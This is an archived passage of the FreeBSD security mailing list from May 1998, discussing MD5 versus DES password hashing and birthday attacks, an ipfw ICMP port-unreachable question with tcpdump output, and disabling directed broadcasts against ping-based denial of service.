probably go for something that takes a bit longer to generate a key. This will slow down brute-force key search attacks. An example of this would be hashing a given string "x" times before sending it to crypt(3). Along parallel lines, is anyone working on patching /usr/bin/passwd to be proactive in rejecting bad passwords instead of simply "suggesting" that the supplied string is too short/weak/lowercase/etc? It is trivial to patch the code to do so but it'd be nice if it happened by default. :) > Jason Hudgins > http://www.incantations.net/~thanatos Nick -- Email: ncb05@uow.edu.au - DE 30 33 D3 16 91 C8 8D A7 F8 70 03 B7 77 1A 2A http://rabble.uow.edu.au/~nick - public key available on request. Nicholas Brawn - Computer Science Undergraduate, University of Wollongong. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 29 23:45:16 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA02614 for freebsd-security-outgoing; Fri, 29 May 1998 23:45:16 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dc1.mfn.org (dc1.mfn.org [204.238.179.1]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id XAA02447; Fri, 29 May 1998 23:44:36 -0700 (PDT) (envelope-from sysadmin@mfn.org) Received: from w3svcs.mfn.org (unverified [204.238.179.11]) by mail.mfn.org (EMWAC SMTPRS 0.83) with SMTP id ; Sat, 30 May 1998 01:46:45 -0500 Received: by w3svcs.mfn.org with Microsoft Mail id <01BD8B6C.68192890@w3svcs.mfn.org>; Sat, 30 May 1998 01:43:55 -0500 Message-ID: <01BD8B6C.68192890@w3svcs.mfn.org> From: "J.A. Terranson" To: "'Gary Palmer'" , Open Systems Networking Cc: Cory Kempf , "freebsd-security@FreeBSD.ORG" Subject: RE: MD5 v. DES? Date: Sat, 30 May 1998 01:43:54 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Actually, this question is nonsensical, as MD5 and DES are two *entirely* different things. MD5 (Message Digest [algorithm] 5) is a *hash* function: It does *NOT* encrypt! What is does is provide a "one way" pseudo-signature based on the contents of the file it is run against. What makes this a "one way" function is that you can get a hash (signature) from a file, but you *cannot* get a file from an hash! DES (Data Encryption Standard [modified LUCIFER]) is a two-way *encryption* function. Not only can you reduce a file to an indecipherable mess, but you can take the mess, and recover the original file. Unfortunately, comparing MD5 and DES is an "apples and oranges" proposition... J.A. Terranson sysadmin@mfn.org > > Is there a discussion somewhere about the merits of MD5 v. DES? > > E.g. what advantages one has over the other? > > If I recall from past memories MD5 i believe is faster. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 29 23:53:53 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA03914 for freebsd-security-outgoing; Fri, 29 May 1998 23:53:53 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gjp.erols.com (alex-va-n008c243.moon.jic.com [206.156.18.253]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA03902 for ; Fri, 29 May 1998 23:53:45 -0700 (PDT) (envelope-from gjp@gjp.erols.com) Received: from gjp.erols.com (localhost.erols.com [127.0.0.1]) by gjp.erols.com (8.8.8/8.8.7) with ESMTP id CAA20838; Sat, 30 May 1998 02:52:25 -0400 (EDT) (envelope-from gjp@gjp.erols.com) To: "J.A. Terranson" cc: Open Systems Networking , Cory Kempf , "freebsd-security@FreeBSD.ORG" From: "Gary Palmer" Subject: Re: MD5 v. DES? In-reply-to: Your message of "Sat, 30 May 1998 01:43:54 CDT." <01BD8B6C.68192890@w3svcs.mfn.org> Date: Sat, 30 May 1998 02:52:25 -0400 Message-ID: <20834.896511145@gjp.erols.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "J.A. Terranson" wrote in message ID <01BD8B6C.68192890@w3svcs.mfn.org>: > > Actually, this question is nonsensical, as MD5 and DES are > two *entirely* different things. Err, actually I think you are missing some context. FreeBSD can use either MD5 or DES passwords. Why? Well, since the way crypt() is used to check passwords is to re-encrypt a supplied password and then checking it against the one in the password database, you *can* use a one way hash like MD5 as a password ``crypt'' since you are only ever encrypting. It also gets around a very tricky situation in the US where you cannot export crypto code. However, you can export hashing functions ... So, in general, you are right. However, in this case I believe we are talking about password functions, and there *is* a relevance to the comparison. Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sat May 30 03:58:43 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA29124 for freebsd-security-outgoing; Sat, 30 May 1998 03:58:43 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cheops.anu.edu.au (avalon@cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA29114; Sat, 30 May 1998 03:58:37 -0700 (PDT) (envelope-from avalon@coombs.anu.edu.au) Message-Id: <199805301058.DAA29114@hub.freebsd.org> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA219545902; Sat, 30 May 1998 20:58:22 +1000 From: Darren Reed Subject: Re: MD5 v. DES? To: sysadmin@mfn.org (J.A. Terranson) Date: Sat, 30 May 1998 20:58:21 +1000 (EST) Cc: gpalmer@FreeBSD.ORG, opsys@mail.webspan.net, ckempf@enigami.com, freebsd-security@FreeBSD.ORG In-Reply-To: <01BD8B6C.68192890@w3svcs.mfn.org> from "J.A. Terranson" at May 30, 98 01:43:54 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from J.A. Terranson, sie said: > > > Actually, this question is nonsensical, as MD5 and DES are > two *entirely* different things. > > MD5 (Message Digest [algorithm] 5) is a *hash* function: It > does *NOT* encrypt! What is does is provide a "one way" > pseudo-signature based on the contents of the file it is run > against. What makes this a "one way" function is that you can > get a hash (signature) from a file, but you *cannot* get a file > from an hash! > > DES (Data Encryption Standard [modified LUCIFER]) is a two-way > *encryption* function. Not only can you reduce a file to an > indecipherable mess, but you can take the mess, and recover > the original file. Isn't MD-5 also classed as a cryptographic checksum or is that just limited to SHA-1 and RIPE-MD ? Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sat May 30 09:50:12 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA29802 for freebsd-security-outgoing; Sat, 30 May 1998 09:50:12 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dc1.mfn.org (dc1.mfn.org [204.238.179.1]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id JAA29664; Sat, 30 May 1998 09:49:28 -0700 (PDT) (envelope-from sysadmin@mfn.org) Received: from w3svcs.mfn.org (unverified [204.238.179.11]) by mail.mfn.org (EMWAC SMTPRS 0.83) with SMTP id ; Sat, 30 May 1998 11:50:02 -0500 Received: by w3svcs.mfn.org with Microsoft Mail id <01BD8BC0.AC500930@w3svcs.mfn.org>; Sat, 30 May 1998 11:47:07 -0500 Message-ID: <01BD8BC0.AC500930@w3svcs.mfn.org> From: "J.A. Terranson" To: "'Darren Reed'" Cc: "gpalmer@FreeBSD.ORG" , "opsys@mail.webspan.net" , "ckempf@enigami.com" , "freebsd-security@FreeBSD.ORG" Subject: RE: MD5 v. DES? Date: Sat, 30 May 1998 11:47:05 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [=] I *believe* it is, and it is *definitely* used as such, but I couldn't commit to this answer without checking... J.A. Terranson sysadmin@mfn.org Isn't MD-5 also classed as a cryptographic checksum or is that just limited to SHA-1 and RIPE-MD ? Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sat May 30 10:09:22 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA02592 for freebsd-security-outgoing; Sat, 30 May 1998 10:09:22 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dc1.mfn.org (dc1.mfn.org [204.238.179.1]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id KAA02514; Sat, 30 May 1998 10:08:54 -0700 (PDT) (envelope-from sysadmin@mfn.org) Received: from w3svcs.mfn.org (unverified [204.238.179.11]) by mail.mfn.org (EMWAC SMTPRS 0.83) with SMTP id ; Sat, 30 May 1998 12:10:54 -0500 Received: by w3svcs.mfn.org with Microsoft Mail id <01BD8BC3.962CBD80@w3svcs.mfn.org>; Sat, 30 May 1998 12:07:59 -0500 Message-ID: <01BD8BC3.962CBD80@w3svcs.mfn.org> From: "J.A. Terranson" To: "'Gary Palmer'" Cc: Open Systems Networking , Cory Kempf , "freebsd-security@FreeBSD.ORG" Subject: RE: MD5 v. DES? Date: Sat, 30 May 1998 12:07:57 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "J.A. Terranson" wrote in message ID <01BD8B6C.68192890@w3svcs.mfn.org>: > > Actually, this question is nonsensical, as MD5 and DES are > two *entirely* different things. So, in general, you are right. However, in this case I believe we are talking about password functions, and there *is* a relevance to the comparison. [=] I was not aware of the context (I was responding to "digested" 8-> form of the original message (having never seen the original) which did not make the context clear... Within this context, I would submit that DES is the "better" function, as it is not subject to "birthday" problems, I do realize however, in the *real* world, this is probably not a *real* issue... J.A. Terranson sysadmin@mfn.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sat May 30 11:33:03 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA13077 for freebsd-security-outgoing; Sat, 30 May 1998 11:33:03 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns1.yes.no (ns1.yes.no [195.119.24.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA13007 for ; Sat, 30 May 1998 11:32:27 -0700 (PDT) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.8.7/8.8.7) with ESMTP id SAA10540; Sat, 30 May 1998 18:32:25 GMT Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id UAA05785; Sat, 30 May 1998 20:32:04 +0200 (MET DST) Message-ID: <19980530203204.34537@follo.net> Date: Sat, 30 May 1998 20:32:04 +0200 From: Eivind Eklund To: "J.A. Terranson" Cc: "freebsd-security@FreeBSD.ORG" Subject: Re: MD5 v. DES? References: <01BD8BC3.962CBD80@w3svcs.mfn.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.89.1i In-Reply-To: <01BD8BC3.962CBD80@w3svcs.mfn.org>; from J.A. Terranson on Sat, May 30, 1998 at 12:07:57PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, May 30, 1998 at 12:07:57PM -0500, J.A. Terranson wrote: > [=] I was not aware of the context (I was responding to > "digested" 8-> form of the original message (having never > seen the original) which did not make the context clear... > > Within this context, I would submit that DES is the "better" > function, as it is not subject to "birthday" problems, I do realize > however, in the *real* world, this is probably not a *real* issue... I think you've misunderstood much of the basis here. (1) EVERY hash function is subject to 'birthday' attacks. All of them. It is _not_ possible to avoid. The question (if the hash is cryptographically secure) is only one of key length. (2) "Birthday" attacks are a real issue. They mean that hash-length is effectively severely reduced for proving ID of a certain document. (3) They're absolutely not relevant for the present context, which is one of password hashing. Passwords are supposed to go through a good, paramterized one-way hash. The 'birthday' attack could be used to create a password entry that could be used with two different passwords. This is not a security problem. Apart from that, my ideal hash for a password file is one based on searching for public keys. It'd go like this: (1) Salt the password (2) Use a cheap one-way hash to create a start value for a pseudo-random function (e.g, an LFSR) (3) Use the random-function to do a deterministic search for a public/private key pair (4) Store the salt and the public part of the key as the hash The advantage of this is that the stored password hash can be used to do challenges against. We can determine that a client has the password by sending a challenge consisting of some random data and the salt. The client run through step 1 through 3 above, and then use the private key to sign the data and return that to the server. Voila - we've proved that the client has the password, without relealing anything to the server (or any listeners). Much better than shared secrets. Eivind. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sat May 30 12:20:37 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA19615 for freebsd-security-outgoing; Sat, 30 May 1998 12:20:37 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from critter.freebsd.dk ([195.8.133.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA19600 for ; Sat, 30 May 1998 12:20:13 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.8.7/8.8.5) with ESMTP id VAA20475; Sat, 30 May 1998 21:18:28 +0200 (CEST) To: Eivind Eklund cc: "J.A. Terranson" , "freebsd-security@FreeBSD.ORG" Subject: Re: MD5 v. DES? In-reply-to: Your message of "Sat, 30 May 1998 20:32:04 +0200." <19980530203204.34537@follo.net> Date: Sat, 30 May 1998 21:18:27 +0200 Message-ID: <20473.896555907@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <19980530203204.34537@follo.net>, Eivind Eklund writes: >On Sat, May 30, 1998 at 12:07:57PM -0500, J.A. Terranson wrote: >Apart from that, my ideal hash for a password file is one based on >searching for public keys. It'd go like this: >(1) Salt the password >(2) Use a cheap one-way hash to create a start value for a > pseudo-random function (e.g, an LFSR) >(3) Use the random-function to do a deterministic search for a > public/private key pair >(4) Store the salt and the public part of the key as the hash I have been considering if we shouldn't introduce a int checkuserpassword(char *user, char *password); in some library, rather than having all these programs know that you should strcmp after calling crypt(). This would allow us to do what you propose or RADIUS authentication for that matter... -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." "ttyv0" -- What UNIX calls a $20K state-of-the-art, 3D, hi-res color terminal To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sat May 30 12:32:38 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA20937 for freebsd-security-outgoing; Sat, 30 May 1998 12:32:38 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from alpha.sea-to-sky.net (sreid@sea-to-sky.net [204.244.200.240]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA20880; Sat, 30 May 1998 12:32:09 -0700 (PDT) (envelope-from sreid@alpha.sea-to-sky.net) Received: (from sreid@localhost) by alpha.sea-to-sky.net (8.8.7/8.8.7) id MAA20828; Sat, 30 May 1998 12:40:30 -0700 Date: Sat, 30 May 1998 12:40:30 -0700 (PDT) From: Steve Reid To: "J.A. Terranson" cc: "'Gary Palmer'" , Open Systems Networking , Cory Kempf , "freebsd-security@FreeBSD.ORG" Subject: RE: MD5 v. DES? In-Reply-To: <01BD8BC3.962CBD80@w3svcs.mfn.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 30 May 1998, J.A. Terranson wrote: > Within this context, I would submit that DES is the "better" > function, as it is not subject to "birthday" problems, I do realize > however, in the *real* world, this is probably not a *real* issue... As far as I know, all hash functions are subject to birthday attacks, including DES when it is used as a hash function. In fact, DES-based crypt is more vulnerable to birthday attacks than MD5, because the DES hash produces fewer bits. Birthday attacks don't really work against password files though: you'd need to have billions of users before you are likely to have two with different password/salt but the same DES hash. As for DES and MD5 being apples and oranges, that's not quite true. There are constructions to use block ciphers as hash functions, and constructions to use hash functions as block ciphers. Still, you are better off using the right tool for the job, which in the case of crypt is MD5 (when you have the choice). To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sat May 30 14:02:11 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA02649 for freebsd-security-outgoing; Sat, 30 May 1998 14:02:11 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns1.yes.no (ns1.yes.no [195.119.24.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA02455 for ; Sat, 30 May 1998 14:00:32 -0700 (PDT) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.8.7/8.8.7) with ESMTP id VAA13668; Sat, 30 May 1998 21:00:28 GMT Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id WAA06137; Sat, 30 May 1998 22:58:47 +0200 (MET DST) Message-ID: <19980530225842.57628@follo.net> Date: Sat, 30 May 1998 22:58:42 +0200 From: Eivind Eklund To: Poul-Henning Kamp Cc: "J.A. Terranson" , "freebsd-security@FreeBSD.ORG" Subject: Re: MD5 v. DES? References: <19980530203204.34537@follo.net> <20473.896555907@critter.freebsd.dk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.89.1i In-Reply-To: <20473.896555907@critter.freebsd.dk>; from Poul-Henning Kamp on Sat, May 30, 1998 at 09:18:27PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, May 30, 1998 at 09:18:27PM +0200, Poul-Henning Kamp wrote: > I have been considering if we shouldn't introduce a > > int checkuserpassword(char *user, char *password); > > in some library, rather than having all these programs know that > you should strcmp after calling crypt(). This would allow us to > do what you propose or RADIUS authentication for that matter... I think the basic idea is good. It is not required for what I proposed - that will work perfectly well as a normal hash - but I'd still like to abstract. However, wouldn't it be advantageous to be able to do other forms of authentication too, like tokens etc? These might require a challenge, and an API to handle this. I'm tolkd PKCS#11 (reference paper from RSA, Inc) contains an API-standard for it. Eivind. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sat May 30 14:52:09 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA10479 for freebsd-security-outgoing; Sat, 30 May 1998 14:52:09 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.ftf.dk (mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA10315 for ; Sat, 30 May 1998 14:51:06 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk) Received: from mail.prosa.dk ([192.168.100.2]) by mail.ftf.dk (8.8.8/8.8.8/gw-ftf-1.0) with ESMTP id XAA01450 for ; Sat, 30 May 1998 23:50:39 +0200 (CEST) (envelope-from regnauld@deepo.prosa.dk) X-Authentication-Warning: mail.ftf.dk: Host [192.168.100.2] claimed to be mail.prosa.dk Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.5/8.8.5/prosa-1.1) with ESMTP id XAA16643 for ; Sat, 30 May 1998 23:51:17 +0200 (CEST) Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.8/8.8.5/prosa-1.1) id XAA25176 for freebsd-security@freebsd.org; Sat, 30 May 1998 23:49:42 +0200 (CEST) Message-ID: <19980530234807.14632@deepo.prosa.dk> Date: Sat, 30 May 1998 23:48:08 +0200 From: Philippe Regnauld To: security@deepo.prosa.dk Cc: freebsd-net@FreeBSD.ORG Subject: ipfw & icmp question Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.88e X-Operating-System: FreeBSD 2.2.6-RELEASE i386 Organization: PROSA Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [crossposting to -net and -security -- shoot me if necessary] I am a bit puzzled regarding the following situation: I have a machine with IPFW setup to send "port unreachable" if a connection attempt is made on port 113/TCP (identd). The policy is default deny. Here is what happens when I do "telnet host 113" - from a FreeBSD host (A.B.C.D) to the FreeBSD box (E.F.G.H): 01:35:02.307343 A.B.C.D.2218 > E.F.G.H.113: S 2940925835:2940925835(0) win 16384 (DF) [tos 0x10] 01:35:02.308070 E.F.G.H > A.B.C.D: icmp: E.F.G.H tcp port 113 unreachable (DF) 01:35:04.850388 A.B.C.D.2218 > E.F.G.H.113: S 2940925835:2940925835(0) win 16384 (DF) [tos 0x10] 01:35:04.851237 E.F.G.H > A.B.C.D: icmp: E.F.G.H tcp port 113 unreachable (DF) Symptom: the connection is NOT dropped right away, and the first host (A.B.C.D) keeps on trying until timeout -- thus the packet being sent twice as above) Both hosts are 2.2.6 - from a Linux box (W.X.Y.Z) to the same FreeBSD box (E.F.G.H): 01:38:22.901190 W.X.Y.Z.1166 > E.F.G.H.113: S 3448428087:3448428087(0) win 512 01:38:22.901969 E.F.G.H > W.X.Y.Z: icmp: E.F.G.H tcp port 113 unreachable No problem here, the linux telnet responds: Trying E.F.G.H... telnet: Unable to connect to remote host: Connection refused ... and returns right away. The IPFW rule is: add unreach port tcp from any to E.F.G.H 113 ... and of course ICMP messages are enabled. Help ? :-} I've looked in the O'Reilly book and other sources but I can't find out this one. PS: in the /etc/rc.firewall (2.2.6 still), one rule says for the "Simple firewall setup": # Allow DNS queries out in the world /sbin/ipfw add pass udp from any 53 to ${oip} /sbin/ipfw add pass udp from ${oip} to any 53 This is a but confusing -- from reading the rules, I understand: "Allow DNS queries, from out in the world, to us", while the formulation above says "Allow DNS queries from inside/here out into the world". My 0.02 Euros^H^HDKK. -- -[ Philippe Regnauld / Sysadmin ]- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sat May 30 16:06:59 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA21071 for freebsd-security-outgoing; Sat, 30 May 1998 16:06:59 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns2.sminter.com.ar (ns2.sminter.com.ar [200.10.100.11]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA20046 for ; Sat, 30 May 1998 15:59:58 -0700 (PDT) (envelope-from Recabarren!fpscha@ns2.sminter.com.ar) Received: (from uucp@localhost) by ns2.sminter.com.ar (8.8.5/8.8.4) id TAA28256 for FreeBSD.ORG!freebsd-security; Sat, 30 May 1998 19:58:22 -0300 (GMT) >Received: (from fpscha@localhost) by localhost.schapachnik.com.ar (8.8.5/8.8.5) id JAA00209; Sat, 30 May 1998 09:31:47 -0300 (ARST) From: "Fernando P. Schapachnik" Message-Id: <199805301231.JAA00209@localhost.schapachnik.com.ar> Subject: Re: Possible DoS opportunity via ping implementation error? To: dg@root.com Date: Sat, 30 May 1998 09:31:46 -0300 (ARST) Cc: andrew@squiz.co.nz, sysadmin@mfn.org, freebsd-security@FreeBSD.ORG In-Reply-To: <199805272358.QAA10311@implode.root.com> from David Greenman at "May 27, 98 04:58:31 pm" Reply-To: fpscha@schapachnik.com.ar X-Mailer: ELM [version 2.4ME+ PL22 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Content-Type: text/plain; charset=ISO-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org En un mensaje anterior David Greenman escribi¢: > > > >I'd like to know which. > ... > >>FreeBSD, Inc. > >>============= > >>In FreeBSD 2.2.5 and up, the tcp/ip stack does not respond to icmp > >>echo requests destined to broadcast and multicast addresses by default. This > >>behaviour can be changed via the sysctl command via > >>mib net.inet.icmp.bmcastecho. > > The CERT advisory is wrong. FreeBSD has always responded to broadcast ICMP > echo requests by default. Further, the option mentioned to disable them was > broken in 2.2.x and -current until just yesterday. Anyway, as a piece of advice, the best thing you can do is to configure your router interfaces' to disallow broadcasts. This is done via the 'no ip directed broadcast' command on the serial interfaces, on CISCO routers. Of course, this is not a final solution, but is very practical if you can "trust" your LAN, as is mostly the case. Regards! Fernando P. Schapachnik fpscha@schapachnik.com.ar To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sat May 30 23:03:57 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA09452 for freebsd-security-outgoing; Sat, 30 May 1998 23:03:57 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from hamptons.com (hamptons.com [204.141.112.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA09355 for ; Sat, 30 May 1998 23:03:41 -0700 (PDT) (envelope-from gms@hamptons.com) Received: from [204.141.112.238] ([204.141.112.238]) by hamptons.com with ESMTP (IPAD 2.03) id 4030400 ; Sun, 31 May 1998 02:03:37 EST X-Sender: gms@mail.hamptons.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sun, 31 May 1998 02:02:24 -0500 To: freebsd-security@FreeBSD.ORG From: GMS Subject: subscribe Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message